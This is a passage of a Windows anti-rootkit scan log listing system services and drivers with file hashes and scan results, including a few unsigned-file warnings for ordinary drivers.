20:31:30.0421 2536 symc8xx - ok
20:31:30.0421 2536 sym_hi - ok
20:31:30.0437 2536 sym_u3 - ok
20:31:30.0453 2536 [ 8B83F3ED0F1688B4958F77CD6D2BF290 ] sysaudio C:\WINDOWS\system32\drivers\sysaudio.sys
20:31:30.0453 2536 sysaudio - ok
20:31:30.0484 2536 [ C7ABBC59B43274B1109DF6B24D617051 ] SysmonLog C:\WINDOWS\system32\smlogsvc.exe
20:31:30.0500 2536 SysmonLog - ok
20:31:30.0531 2536 [ 3CB78C17BB664637787C9A1C98F79C38 ] TapiSrv C:\WINDOWS\System32\tapisrv.dll
20:31:30.0546 2536 TapiSrv - ok
20:31:30.0593 2536 [ 9AEFA14BD6B182D61E3119FA5F436D3D ] Tcpip C:\WINDOWS\system32\DRIVERS\tcpip.sys
20:31:30.0609 2536 Tcpip - ok
20:31:30.0640 2536 [ 6471A66807F5E104E4885F5B67349397 ] TDPIPE C:\WINDOWS\system32\drivers\TDPIPE.sys
20:31:30.0640 2536 TDPIPE - ok
20:31:30.0656 2536 [ C56B6D0402371CF3700EB322EF3AAF61 ] TDTCP C:\WINDOWS\system32\drivers\TDTCP.sys
20:31:30.0656 2536 TDTCP - ok
20:31:30.0687 2536 [ 88155247177638048422893737429D9E ] TermDD C:\WINDOWS\system32\DRIVERS\termdd.sys
20:31:30.0687 2536 TermDD - ok
20:31:30.0750 2536 [ FF3477C03BE7201C294C35F684B3479F ] TermService C:\WINDOWS\System32\termsrv.dll
20:31:30.0765 2536 TermService - ok
20:31:30.0781 2536 [ 99BC0B50F511924348BE19C7C7313BBF ] Themes C:\WINDOWS\System32\shsvcs.dll
20:31:30.0796 2536 Themes - ok
20:31:30.0812 2536 TosIde - ok
20:31:30.0828 2536 [ 55BCA12F7F523D35CA3CB833C725F54E ] TrkWks C:\WINDOWS\system32\trkwks.dll
20:31:30.0843 2536 TrkWks - ok
20:31:30.0875 2536 [ 5787B80C2E3C5E2F56C2A233D91FA2C9 ] Udfs C:\WINDOWS\system32\drivers\Udfs.sys
20:31:30.0875 2536 Udfs - ok
20:31:30.0890 2536 ultra - ok
20:31:30.0937 2536 [ 402DDC88356B1BAC0EE3DD1580C76A31 ] Update C:\WINDOWS\system32\DRIVERS\update.sys
20:31:30.0953 2536 Update - ok
20:31:31.0000 2536 [ 1EBAFEB9A3FBDC41B8D9C7F0F687AD91 ] upnphost C:\WINDOWS\System32\upnphost.dll
20:31:31.0015 2536 upnphost - ok
20:31:31.0046 2536 [ 05365FB38FCA1E98F7A566AAAF5D1815 ] UPS C:\WINDOWS\System32\ups.exe
20:31:31.0062 2536 UPS - ok
20:31:31.0078 2536 [ E919708DB44ED8543A7C017953148330 ] usbaudio C:\WINDOWS\system32\drivers\usbaudio.sys
20:31:31.0093 2536 usbaudio - ok
20:31:31.0125 2536 [ 173F317CE0DB8E21322E71B7E60A27E8 ] usbccgp C:\WINDOWS\system32\DRIVERS\usbccgp.sys
20:31:31.0125 2536 usbccgp - ok
20:31:31.0187 2536 [ 65DCF09D0E37D4C6B11B5B0B76D470A7 ] usbehci C:\WINDOWS\system32\DRIVERS\usbehci.sys
20:31:31.0187 2536 usbehci - ok
20:31:31.0203 2536 [ 1AB3CDDE553B6E064D2E754EFE20285C ] usbhub C:\WINDOWS\system32\DRIVERS\usbhub.sys
20:31:31.0203 2536 usbhub - ok
20:31:31.0234 2536 [ 0DAECCE65366EA32B162F85F07C6753B ] usbohci C:\WINDOWS\system32\DRIVERS\usbohci.sys
20:31:31.0234 2536 usbohci - ok
20:31:31.0250 2536 [ A717C8721046828520C9EDF31288FC00 ] usbprint C:\WINDOWS\system32\DRIVERS\usbprint.sys
20:31:31.0250 2536 usbprint - ok
20:31:31.0281 2536 [ A0B8CF9DEB1184FBDD20784A58FA75D4 ] usbscan C:\WINDOWS\system32\DRIVERS\usbscan.sys
20:31:31.0281 2536 usbscan - ok
20:31:31.0312 2536 [ A32426D9B14A089EAA1D922E0C5801A9 ] USBSTOR C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS
20:31:31.0312 2536 USBSTOR - ok
20:31:31.0359 2536 [ 26496F9DEE2D787FC3E61AD54821FFE6 ] usbuhci C:\WINDOWS\system32\DRIVERS\usbuhci.sys
20:31:31.0359 2536 usbuhci - ok
20:31:31.0359 2536 [ 0D3A8FAFCEACD8B7625CD549757A7DF1 ] VgaSave C:\WINDOWS\System32\drivers\vga.sys
20:31:31.0375 2536 VgaSave - ok
20:31:31.0406 2536 [ 4B039BBD037B01F5DB5A144C837F283A ] viaagp1 C:\WINDOWS\system32\DRIVERS\viaagp1.sys
20:31:31.0406 2536 viaagp1 - ok
20:31:31.0437 2536 [ 0CC705DB634A3BC355887E3D478DD386 ] viagfx C:\WINDOWS\system32\DRIVERS\vtmini.sys
20:31:31.0453 2536 viagfx - ok
20:31:31.0453 2536 [ 3B3EFCDA263B8AC14FDF9CBDD0791B2E ] ViaIde C:\WINDOWS\system32\DRIVERS\viaide.sys
20:31:31.0468 2536 ViaIde - ok
20:31:31.0468 2536 [ 4C8FCB5CC53AAB716D810740FE59D025 ] VolSnap C:\WINDOWS\system32\drivers\VolSnap.sys
20:31:31.0484 2536 VolSnap - ok
20:31:31.0515 2536 [ 7A9DB3A67C333BF0BD42E42B8596854B ] VSS C:\WINDOWS\System32\vssvc.exe
20:31:31.0546 2536 VSS - ok
20:31:31.0578 2536 [ 54AF4B1D5459500EF0937F6D33B1914F ] W32Time C:\WINDOWS\system32\w32time.dll
20:31:31.0593 2536 W32Time - ok
20:31:31.0609 2536 [ E20B95BAEDB550F32DD489265C1DA1F6 ] Wanarp C:\WINDOWS\system32\DRIVERS\wanarp.sys
20:31:31.0609 2536 Wanarp - ok
20:31:31.0625 2536 WDICA - ok
20:31:31.0640 2536 [ 6768ACF64B18196494413695F0C3A00F ] wdmaud C:\WINDOWS\system32\drivers\wdmaud.sys
20:31:31.0640 2536 wdmaud - ok
20:31:31.0671 2536 [ 77A354E28153AD2D5E120A5A8687BC06 ] WebClient C:\WINDOWS\System32\webclnt.dll
20:31:31.0687 2536 WebClient - ok
20:31:31.0765 2536 [ F45DD1E1365D857DD08BC23563370D0E ] WinDefend C:\Program Files\Windows Defender\MsMpEng.exe
20:31:31.0765 2536 WinDefend - ok
20:31:31.0843 2536 [ 2D0E4ED081963804CCC196A0929275B5 ] winmgmt C:\WINDOWS\system32\wbem\WMIsvc.dll
20:31:31.0859 2536 winmgmt - ok
20:31:31.0906 2536 [ C51B4A5C05A5475708E3C81C7765B71D ] WmdmPmSN C:\WINDOWS\system32\MsPMSNSv.dll
20:31:31.0921 2536 WmdmPmSN - ok
20:31:31.0953 2536 [ E0673F1106E62A68D2257E376079F821 ] WmiApSrv C:\WINDOWS\System32\wbem\wmiapsrv.exe
20:31:31.0953 2536 WmiApSrv - ok
20:31:32.0046 2536 [ F74E3D9A7FA9556C3BBB14D4E5E63D3B ] WMPNetworkSvc C:\Program Files\Windows Media Player\WMPNetwk.exe
20:31:32.0078 2536 WMPNetworkSvc - ok
20:31:32.0109 2536 [ CF4DEF1BF66F06964DC0D91844239104 ] WpdUsb C:\WINDOWS\system32\DRIVERS\wpdusb.sys
20:31:32.0109 2536 WpdUsb - ok
20:31:32.0156 2536 [ 6ABE6E225ADB5A751622A9CC3BC19CE8 ] WS2IFSL C:\WINDOWS\System32\drivers\ws2ifsl.sys
20:31:32.0156 2536 WS2IFSL - ok
20:31:32.0203 2536 [ 7C278E6408D1DCE642230C0585A854D5 ] wscsvc C:\WINDOWS\system32\wscsvc.dll
20:31:32.0250 2536 wscsvc - ok
20:31:32.0281 2536 [ 35321FB577CDC98CE3EB3A3EB9E4610A ] wuauserv C:\WINDOWS\system32\wuauserv.dll
20:31:32.0296 2536 wuauserv - ok
20:31:32.0328 2536 [ F15FEAFFFBB3644CCC80C5DA584E6311 ] WudfPf C:\WINDOWS\system32\DRIVERS\WudfPf.sys
20:31:32.0343 2536 WudfPf - ok
20:31:32.0375 2536 [ 28B524262BCE6DE1F7EF9F510BA3985B ] WudfRd C:\WINDOWS\system32\DRIVERS\wudfrd.sys
20:31:32.0375 2536 WudfRd - ok
20:31:32.0390 2536 [ 05231C04253C5BC30B26CBAAE680ED89 ] WudfSvc C:\WINDOWS\System32\WUDFSvc.dll
20:31:32.0437 2536 WudfSvc - ok
20:31:32.0484 2536 [ 81DC3F549F44B1C1FFF022DEC9ECF30B ] WZCSVC C:\WINDOWS\System32\wzcsvc.dll
20:31:32.0531 2536 WZCSVC - ok
20:31:32.0562 2536 [ 295D21F14C335B53CB8154E5B1F892B9 ] xmlprov C:\WINDOWS\System32\xmlprov.dll
20:31:32.0578 2536 xmlprov - ok
20:31:32.0593 2536 ================ Scan global ===============================
20:31:32.0640 2536 [ 42F1F4C0AFB08410E5F02D4B13EBB623 ] C:\WINDOWS\system32\basesrv.dll
20:31:32.0671 2536 [ 8C7DCA4B158BF16894120786A7A5F366 ] C:\WINDOWS\system32\winsrv.dll
20:31:32.0703 2536 [ 8C7DCA4B158BF16894120786A7A5F366 ] C:\WINDOWS\system32\winsrv.dll
20:31:32.0718 2536 [ 65DF52F5B8B6E9BBD183505225C37315 ] C:\WINDOWS\system32\services.exe
20:31:32.0734 2536 [Global] - ok
20:31:32.0734 2536 ================ Scan MBR ==================================
20:31:32.0750 2536 [ BAD0263FBE81B49F5F07B32DC9D198B3 ] \Device\Harddisk0\DR0
20:31:32.0921 2536 \Device\Harddisk0\DR0 - ok
20:31:32.0921 2536 ================ Scan VBR ==================================
20:31:32.0921 2536 [ 085D431551BA33298DDBA5C93B1F437B ] \Device\Harddisk0\DR0\Partition1
20:31:32.0921 2536 \Device\Harddisk0\DR0\Partition1 - ok
20:31:32.0921 2536 [ 98DE57513725D00BD7B7284BCAEF83E8 ] \Device\Harddisk0\DR0\Partition2
20:31:32.0937 2536 \Device\Harddisk0\DR0\Partition2 - ok
20:31:32.0937 2536 ============================================================
20:31:32.0937 2536 Scan finished
20:31:32.0937 2536 ============================================================
20:31:32.0953 2924 Detected object count: 0
20:31:32.0953 2924 Actual detected object count: 0
20:32:15.0531 3536 ============================================================
20:32:15.0546 3536 Scan started
20:32:15.0546 3536 Mode: Manual; SigCheck; TDLFS;
20:32:15.0546 3536 ============================================================
20:32:15.0640 3536 ================ Scan system memory ========================
20:32:15.0640 3536 System memory - ok
20:32:15.0640 3536 ================ Scan services =============================
20:32:15.0812 3536 [ 149A8F7ADF9742554DC323E290551E3E ] Aavmker4 C:\WINDOWS\system32\drivers\Aavmker4.sys
20:32:17.0484 3536 Aavmker4 - ok
20:32:17.0500 3536 Abiosdsk - ok
20:32:17.0500 3536 abp480n5 - ok
20:32:17.0593 3536 [ 8FD99680A539792A30E97944FDAECF17 ] ACPI C:\WINDOWS\system32\DRIVERS\ACPI.sys
20:32:18.0640 3536 ACPI - ok
20:32:18.0687 3536 [ 9859C0F6936E723E4892D7141B1327D5 ] ACPIEC C:\WINDOWS\system32\drivers\ACPIEC.sys
20:32:18.0906 3536 ACPIEC - ok
20:32:18.0921 3536 adpu160m - ok
20:32:18.0984 3536 [ 8BED39E3C35D6A489438B8141717A557 ] aec C:\WINDOWS\system32\drivers\aec.sys
20:32:19.0218 3536 aec - ok
20:32:19.0265 3536 [ 1E44BC1E83D8FD2305F8D452DB109CF9 ] AFD C:\WINDOWS\System32\drivers\afd.sys
20:32:19.0328 3536 AFD - ok
20:32:19.0343 3536 [ C685CC27A2E637F0DCB5A45E67CC6F74 ] AFS2K C:\WINDOWS\system32\drivers\AFS2K.sys
20:32:19.0375 3536 AFS2K - ok
20:32:19.0421 3536 [ 593AEFC67283D409F34CC1245D00A509 ] AgereSoftModem C:\WINDOWS\system32\DRIVERS\AGRSM.sys
20:32:19.0546 3536 AgereSoftModem - ok
20:32:19.0562 3536 Aha154x - ok
20:32:19.0578 3536 aic78u2 - ok
20:32:19.0593 3536 aic78xx - ok
20:32:19.0609 3536 [ A9A3DAA780CA6C9671A19D52456705B4 ] Alerter C:\WINDOWS\system32\alrsvc.dll
20:32:19.0859 3536 Alerter - ok
20:32:19.0890 3536 [ 8C515081584A38AA007909CD02020B3D ] ALG C:\WINDOWS\System32\alg.exe
20:32:19.0984 3536 ALG - ok
20:32:20.0000 3536 AliIde - ok
20:32:20.0109 3536 [ 8FCE268CDBDD83B23419D1F35F42C7B1 ] AmdK7 C:\WINDOWS\system32\DRIVERS\amdk7.sys
20:32:20.0328 3536 AmdK7 - ok
20:32:20.0343 3536 amsint - ok
20:32:20.0343 3536 AppMgmt - ok
20:32:20.0390 3536 [ B5B8A80875C1DEDEDA8B02765642C32F ] Arp1394 C:\WINDOWS\system32\DRIVERS\arp1394.sys
20:32:20.0609 3536 Arp1394 - ok
20:32:20.0625 3536 asc - ok
20:32:20.0640 3536 asc3350p - ok
20:32:20.0640 3536 asc3550 - ok
20:32:20.0781 3536 [ 0E5E4957549056E2BF2C49F4F6B601AD ] aspnet_state C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
20:32:20.0812 3536 aspnet_state - ok
20:32:20.0843 3536 [ DE6ED95AEF259979B2830450072A627B ] aswFsBlk C:\WINDOWS\system32\drivers\aswFsBlk.sys
20:32:20.0875 3536 aswFsBlk - ok
20:32:20.0906 3536 [ 84F0BE324EE111338589F448C3E8BAB2 ] aswMon2 C:\WINDOWS\system32\drivers\aswMon2.sys
20:32:20.0937 3536 aswMon2 - ok
20:32:20.0984 3536 [ 7C9F0A2AB17D52261A9252A2EB320884 ] AswRdr C:\WINDOWS\system32\drivers\AswRdr.sys
20:32:21.0015 3536 AswRdr - ok
20:32:21.0031 3536 [ B32E9AD44A1DBB3E8095E80F8DF32B03 ] aswSnx C:\WINDOWS\system32\drivers\aswSnx.sys
20:32:21.0093 3536 aswSnx - ok
20:32:21.0140 3536 [ 67B558895695545FB0568B7541F3BCA7 ] aswSP C:\WINDOWS\system32\drivers\aswSP.sys
20:32:21.0187 3536 aswSP - ok
20:32:21.0234 3536 [ E3E73B2B73A4DFADFDDF557192C4B08A ] aswTdi C:\WINDOWS\system32\drivers\aswTdi.sys
20:32:21.0265 3536 aswTdi - ok
20:32:21.0281 3536 [ B153AFFAC761E7F5FCFA822B9C4E97BC ] AsyncMac C:\WINDOWS\system32\DRIVERS\asyncmac.sys
20:32:21.0468 3536 AsyncMac - ok
20:32:21.0515 3536 [ 9F3A2F5AA6875C72BF062C712CFA2674 ] atapi C:\WINDOWS\system32\DRIVERS\atapi.sys
20:32:21.0687 3536 atapi - ok
20:32:21.0687 3536 Atdisk - ok
20:32:21.0718 3536 [ 9916C1225104BA14794209CFA8012159 ] Atmarpc C:\WINDOWS\system32\DRIVERS\atmarpc.sys
20:32:21.0890 3536 Atmarpc - ok
20:32:21.0937 3536 [ DEF7A7882BEC100FE0B2CE2549188F9D ] AudioSrv C:\WINDOWS\System32\audiosrv.dll
20:32:22.0093 3536 AudioSrv - ok
20:32:22.0140 3536 [ D9F724AA26C010A217C97606B160ED68 ] audstub C:\WINDOWS\system32\DRIVERS\audstub.sys
20:32:22.0296 3536 audstub - ok
20:32:22.0406 3536 [ 8FA553E9AE69808D99C164733A0F9590 ] avast! Antivirus C:\Program Files\AVAST Software\Avast\AvastSvc.exe
20:32:22.0515 3536 avast! Antivirus - ok
20:32:22.0578 3536 [ DA1F27D85E0D1525F6621372E7B685E9 ] Beep C:\WINDOWS\system32\drivers\Beep.sys
20:32:22.0734 3536 Beep - ok
20:32:22.0796 3536 [ 574738F61FCA2935F5265DC4E5691314 ] BITS C:\WINDOWS\system32\qmgr.dll
20:32:22.0984 3536 BITS - ok
20:32:23.0031 3536 [ 3F56903E124E820AEECE6D471583C6C1 ] Bonjour Service C:\Program Files\Bonjour\mDNSResponder.exe
20:32:23.0046 3536 Bonjour Service - ok
20:32:23.0093 3536 [ CFD4E51402DA9838B5A04AE680AF54A0 ] Browser C:\WINDOWS\System32\browser.dll
20:32:23.0171 3536 Browser - ok
20:32:23.0203 3536 [ 248DFA5762DDE38DFDDBBD44149E9D7A ] BVRPMPR5 C:\WINDOWS\system32\drivers\BVRPMPR5.SYS
20:32:23.0234 3536 BVRPMPR5 ( UnsignedFile.Multi.Generic ) - warning
20:32:23.0234 3536 BVRPMPR5 - detected UnsignedFile.Multi.Generic (1)
20:32:23.0390 3536 catchme - ok
20:32:23.0421 3536 [ 90A673FC8E12A79AFBED2576F6A7AAF9 ] cbidf2k C:\WINDOWS\system32\drivers\cbidf2k.sys
20:32:23.0578 3536 cbidf2k - ok
20:32:23.0593 3536 cd20xrnt - ok
20:32:23.0609 3536 [ C1B486A7658353D33A10CC15211A873B ] Cdaudio C:\WINDOWS\system32\drivers\Cdaudio.sys
20:32:23.0765 3536 Cdaudio - ok
20:32:23.0796 3536 [ C885B02847F5D2FD45A24E219ED93B32 ] Cdfs C:\WINDOWS\system32\drivers\Cdfs.sys
20:32:23.0968 3536 Cdfs - ok
20:32:23.0984 3536 [ 1F4260CC5B42272D71F79E570A27A4FE ] Cdrom C:\WINDOWS\system32\DRIVERS\cdrom.sys
20:32:24.0140 3536 Cdrom - ok
20:32:24.0156 3536 Changer - ok
20:32:24.0187 3536 [ 1CFE720EB8D93A7158A4EBC3AB178BDE ] CiSvc C:\WINDOWS\system32\cisvc.exe
20:32:24.0343 3536 CiSvc - ok
20:32:24.0375 3536 [ 34CBE729F38138217F9C80212A2A0C82 ] ClipSrv C:\WINDOWS\system32\clipsrv.exe
20:32:24.0531 3536 ClipSrv - ok
20:32:24.0593 3536 [ D87ACAED61E417BBA546CED5E7E36D9C ] clr_optimization_v2.0.50727_32 C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
20:32:24.0609 3536 clr_optimization_v2.0.50727_32 - ok
20:32:24.0625 3536 CmdIde - ok
20:32:24.0625 3536 COMSysApp - ok
20:32:24.0656 3536 Cpqarray - ok
20:32:24.0703 3536 [ 3D4E199942E29207970E04315D02AD3B ] CryptSvc C:\WINDOWS\System32\cryptsvc.dll
20:32:24.0906 3536 CryptSvc - ok
20:32:24.0906 3536 dac2w2k - ok
20:32:24.0921 3536 dac960nt - ok
20:32:24.0968 3536 [ 6B27A5C03DFB94B4245739065431322C ] DcomLaunch C:\WINDOWS\system32\rpcss.dll
20:32:25.0046 3536 DcomLaunch - ok
20:32:25.0078 3536 [ 5E38D7684A49CACFB752B046357E0589 ] Dhcp C:\WINDOWS\System32\dhcpcsvc.dll
20:32:25.0234 3536 Dhcp - ok
20:32:25.0281 3536 [ 044452051F3E02E7963599FC8F4F3E25 ] Disk C:\WINDOWS\system32\DRIVERS\disk.sys
20:32:25.0437 3536 Disk - ok
20:32:25.0453 3536 dmadmin - ok
20:32:25.0500 3536 [ D992FE1274BDE0F84AD826ACAE022A41 ] dmboot C:\WINDOWS\system32\drivers\dmboot.sys
20:32:25.0703 3536 dmboot - ok
20:32:25.0734 3536 [ 7C824CF7BBDE77D95C08005717A95F6F ] dmio C:\WINDOWS\system32\drivers\dmio.sys
20:32:25.0906 3536 dmio - ok
20:32:25.0953 3536 [ E9317282A63CA4D188C0DF5E09C6AC5F ] dmload C:\WINDOWS\system32\drivers\dmload.sys
20:32:26.0093 3536 dmload - ok
20:32:26.0125 3536 [ 57EDEC2E5F59F0335E92F35184BC8631 ] dmserver C:\WINDOWS\System32\dmserver.dll
20:32:26.0265 3536 dmserver - ok
20:32:26.0312 3536 [ 8A208DFCF89792A484E76C40E5F50B45 ] DMusic C:\WINDOWS\system32\drivers\DMusic.sys
20:32:26.0468 3536 DMusic - ok
20:32:26.0515 3536 [ 5F7E24FA9EAB896051FFB87F840730D2 ] Dnscache C:\WINDOWS\System32\dnsrslvr.dll
20:32:26.0609 3536 Dnscache - ok
20:32:26.0625 3536 [ 0F0F6E687E5E15579EF4DA8DD6945814 ] Dot3svc C:\WINDOWS\System32\dot3svc.dll
20:32:26.0796 3536 Dot3svc - ok
20:32:26.0812 3536 dpti2o - ok
20:32:26.0828 3536 [ 8F5FCFF8E8848AFAC920905FBD9D33C8 ] drmkaud C:\WINDOWS\system32\drivers\drmkaud.sys
20:32:26.0968 3536 drmkaud - ok
20:32:27.0000 3536 [ 2187855A7703ADEF0CEF9EE4285182CC ] EapHost C:\WINDOWS\System32\eapsvc.dll
20:32:27.0171 3536 EapHost - ok
20:32:27.0218 3536 [ BC93B4A066477954555966D77FEC9ECB ] ERSvc C:\WINDOWS\System32\ersvc.dll
20:32:27.0359 3536 ERSvc - ok
20:32:27.0406 3536 [ 38008FAAA9632C2EF8E98BF1614D0527 ] eusk2par C:\WINDOWS\system32\Drivers\eusk2par.sys
20:32:27.0421 3536 eusk2par - ok
20:32:27.0468 3536 [ 65DF52F5B8B6E9BBD183505225C37315 ] Eventlog C:\WINDOWS\system32\services.exe
20:32:27.0500 3536 Eventlog - ok
20:32:27.0546 3536 [ D4991D98F2DB73C60D042F1AEF79EFAE ] EventSystem C:\WINDOWS\System32\es.dll
20:32:27.0609 3536 EventSystem - ok
20:32:27.0640 3536 [ 38D332A6D56AF32635675F132548343E ] Fastfat C:\WINDOWS\system32\drivers\Fastfat.sys
20:32:27.0796 3536 Fastfat - ok
20:32:27.0796 3536 [ 1E580770BDECE924494B368AC980749E ] fasttx2k C:\WINDOWS\system32\DRIVERS\fasttx2k.sys
20:32:27.0859 3536 fasttx2k - ok
20:32:27.0890 3536 [ 99BC0B50F511924348BE19C7C7313BBF ] FastUserSwitchingCompatibility C:\WINDOWS\System32\shsvcs.dll
20:32:27.0953 3536 FastUserSwitchingCompatibility - ok
20:32:27.0984 3536 [ E97D6A8684466DF94FF3BC24FB787A07 ] Fax C:\WINDOWS\system32\fxssvc.exe
20:32:28.0187 3536 Fax - ok
20:32:28.0203 3536 [ 92CDD60B6730B9F50F6A1A0C1F8CDC81 ] Fdc C:\WINDOWS\system32\DRIVERS\fdc.sys
20:32:28.0359 3536 Fdc - ok
20:32:28.0375 3536 [ D45926117EB9FA946A6AF572FBE1CAA3 ] Fips C:\WINDOWS\system32\drivers\Fips.sys
20:32:28.0531 3536 Fips - ok
20:32:28.0562 3536 [ 9D27E7B80BFCDF1CDD9B555862D5E7F0 ] Flpydisk C:\WINDOWS\system32\DRIVERS\flpydisk.sys
20:32:28.0703 3536 Flpydisk - ok
20:32:28.0750 3536 [ B2CF4B0786F8212CB92ED2B50C6DB6B0 ] FltMgr C:\WINDOWS\system32\drivers\fltmgr.sys
20:32:28.0921 3536 FltMgr - ok
20:32:29.0015 3536 [ 8BA7C024070F2B7FDD98ED8A4BA41789 ] FontCache3.0.0.0 c:\WINDOWS\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe
20:32:29.0031 3536 FontCache3.0.0.0 - ok
20:32:29.0078 3536 [ 3E1E2BD4F39B0E2B7DC4F4D2BCC2779A ] Fs_Rec C:\WINDOWS\system32\drivers\Fs_Rec.sys
20:32:29.0218 3536 Fs_Rec - ok
20:32:29.0250 3536 [ 6AC26732762483366C3969C9E4D2259D ] Ftdisk C:\WINDOWS\system32\DRIVERS\ftdisk.sys
20:32:29.0437 3536 Ftdisk - ok
20:32:29.0468 3536 [ AB8A6A87D9D7255C3884D5B9541A6E80 ] GEARAspiWDM C:\WINDOWS\system32\Drivers\GEARAspiWDM.sys
20:32:29.0484 3536 GEARAspiWDM - ok
20:32:29.0515 3536 [ 0A02C63C8B144BD8C86B103DEE7C86A2 ] Gpc C:\WINDOWS\system32\DRIVERS\msgpc.sys
20:32:29.0656 3536 Gpc - ok
20:32:29.0734 3536 [ 506708142BC63DABA64F2D3AD1DCD5BF ] gupdate C:\Program Files\Google\Update\GoogleUpdate.exe
20:32:29.0750 3536 gupdate - ok
20:32:29.0765 3536 [ 506708142BC63DABA64F2D3AD1DCD5BF ] gupdatem C:\Program Files\Google\Update\GoogleUpdate.exe
20:32:29.0781 3536 gupdatem - ok
20:32:29.0796 3536 [ 573C7D0A32852B48F3058CFD8026F511 ] HDAudBus C:\WINDOWS\system32\DRIVERS\HDAudBus.sys
20:32:29.0968 3536 HDAudBus - ok
20:32:30.0046 3536 [ 4FCCA060DFE0C51A09DD5C3843888BCD ] helpsvc C:\WINDOWS\PCHealth\HelpCtr\Binaries\pchsvc.dll
20:32:30.0187 3536 helpsvc - ok
20:32:30.0203 3536 HidServ - ok
20:32:30.0234 3536 [ CCF82C5EC8A7326C3066DE870C06DAF1 ] HidUsb C:\WINDOWS\system32\DRIVERS\hidusb.sys
20:32:30.0375 3536 HidUsb - ok
20:32:30.0406 3536 [ 8878BD685E490239777BFE51320B88E9 ] hkmsvc C:\WINDOWS\System32\kmsvc.dll
20:32:30.0593 3536 hkmsvc - ok
20:32:30.0593 3536 hpn - ok
20:32:30.0703 3536 [ CE0FCEC4D4D860F36D972759B11EAF0F ] hpqcxs08 C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll
20:32:30.0750 3536 hpqcxs08 ( UnsignedFile.Multi.Generic ) - warning
20:32:30.0750 3536 hpqcxs08 - detected UnsignedFile.Multi.Generic (1)
20:32:30.0765 3536 [ EE4C7A4CF2316701FFDE90F404520265 ] hpqddsvc C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll
20:32:30.0781 3536 hpqddsvc ( UnsignedFile.Multi.Generic ) - warning
20:32:30.0781 3536 hpqddsvc - detected UnsignedFile.Multi.Generic (1)
20:32:30.0828 3536 [ 5FABA4775D4C61E55EC669D643FFC71F ] HPZid412 C:\WINDOWS\system32\DRIVERS\HPZid412.sys
20:32:30.0937 3536 HPZid412 - ok
20:32:30.0953 3536 [ A3C43980EE1F1BEAC778B44EA65DBDD4 ] HPZipr12 C:\WINDOWS\system32\DRIVERS\HPZipr12.sys
20:32:31.0015 3536 HPZipr12 - ok
20:32:31.0031 3536 [ 2906949BD4E206F2BB0DD1896CE9F66F ] HPZius12 C:\WINDOWS\system32\DRIVERS\HPZius12.sys
20:32:31.0109 3536 HPZius12 - ok
20:32:31.0140 3536 [ F80A415EF82CD06FFAF0D971528EAD38 ] HTTP C:\WINDOWS\system32\Drivers\HTTP.sys
20:32:31.0203 3536 HTTP - ok
20:32:31.0234 3536 [ 6100A808600F44D999CEBDEF8841C7A3 ] HTTPFilter C:\WINDOWS\System32\w3ssl.dll
20:32:31.0375 3536 HTTPFilter - ok
20:32:31.0375 3536 i2omgmt - ok
20:32:31.0390 3536 i2omp - ok
20:32:31.0437 3536 [ 4A0B06AA8943C1E332520F7440C0AA30 ] i8042prt C:\WINDOWS\system32\DRIVERS\i8042prt.sys
20:32:31.0593 3536 i8042prt - ok
20:32:31.0656 3536 [ 0ACEBB31989CBF9A5663FE4A33D28D21 ] ialm C:\WINDOWS\system32\DRIVERS\ialmnt5.sys
20:32:31.0750 3536 ialm - ok
20:32:31.0843 3536 [ C01AC32DC5C03076CFB852CB5DA5229C ] idsvc C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
20:32:31.0890 3536 idsvc - ok
20:32:31.0937 3536 [ 083A052659F5310DD8B6A6CB05EDCF8E ] Imapi C:\WINDOWS\system32\DRIVERS\imapi.sys
20:32:32.0078 3536 Imapi - ok
20:32:32.0125 3536 [ 30DEAF54A9755BB8546168CFE8A6B5E1 ] ImapiService C:\WINDOWS\system32\imapi.exe
20:32:32.0296 3536 ImapiService - ok
20:32:32.0296 3536 ini910u - ok
20:32:32.0406 3536 [ D383CEF6C0EF6DCAC644E2B954F2C202 ] IntcAzAudAddService C:\WINDOWS\system32\drivers\RtkHDAud.sys
20:32:32.0515 3536 IntcAzAudAddService - ok
20:32:32.0546 3536 [ B5466A9250342A7AA0CD1FBA13420678 ] IntelIde C:\WINDOWS\system32\DRIVERS\intelide.sys
20:32:32.0671 3536 IntelIde - ok
20:32:32.0718 3536 [ 8C953733D8F36EB2133F5BB58808B66B ] intelppm C:\WINDOWS\system32\DRIVERS\intelppm.sys
20:32:32.0859 3536 intelppm - ok
20:32:32.0890 3536 [ 3BB22519A194418D5FEC05D800A19AD0 ] ip6fw C:\WINDOWS\system32\drivers\ip6fw.sys
20:32:33.0062 3536 ip6fw - ok
20:32:33.0093 3536 [ 731F22BA402EE4B62748ADAF6363C182 ] IpFilterDriver C:\WINDOWS\system32\DRIVERS\ipfltdrv.sys
20:32:33.0250 3536 IpFilterDriver - ok
20:32:33.0281 3536 [ B87AB476DCF76E72010632B5550955F5 ] IpInIp C:\WINDOWS\system32\DRIVERS\ipinip.sys
20:32:33.0421 3536 IpInIp - ok
20:32:33.0437 3536 [ CC748EA12C6EFFDE940EE98098BF96BB ] IpNat C:\WINDOWS\system32\DRIVERS\ipnat.sys
20:32:33.0578 3536 IpNat - ok
20:32:33.0625 3536 [ 62937A89470AF8FF172F0980CA8AEFC9 ] iPod Service C:\Program Files\iPod\bin\iPodService.exe
20:32:33.0656 3536 iPod Service - ok
20:32:33.0703 3536 [ 23C74D75E36E7158768DD63D92789A91 ] IPSec C:\WINDOWS\system32\DRIVERS\ipsec.sys
20:32:33.0859 3536 IPSec - ok
20:32:33.0890 3536 [ C93C9FF7B04D772627A3646D89F7BF89 ] IRENUM C:\WINDOWS\system32\DRIVERS\irenum.sys
20:32:33.0968 3536 IRENUM - ok
20:32:34.0000 3536 [ 05A299EC56E52649B1CF2FC52D20F2D7 ] isapnp C:\WINDOWS\system32\DRIVERS\isapnp.sys
20:32:34.0125 3536 isapnp - ok
20:32:34.0171 3536 [ F59C3569A2F2C464BB78CB1BDCDCA55E ] Iviaspi C:\WINDOWS\system32\drivers\iviaspi.sys
20:32:34.0171 3536 Iviaspi ( UnsignedFile.Multi.Generic ) - warning
20:32:34.0171 3536 Iviaspi - detected UnsignedFile.Multi.Generic (1)
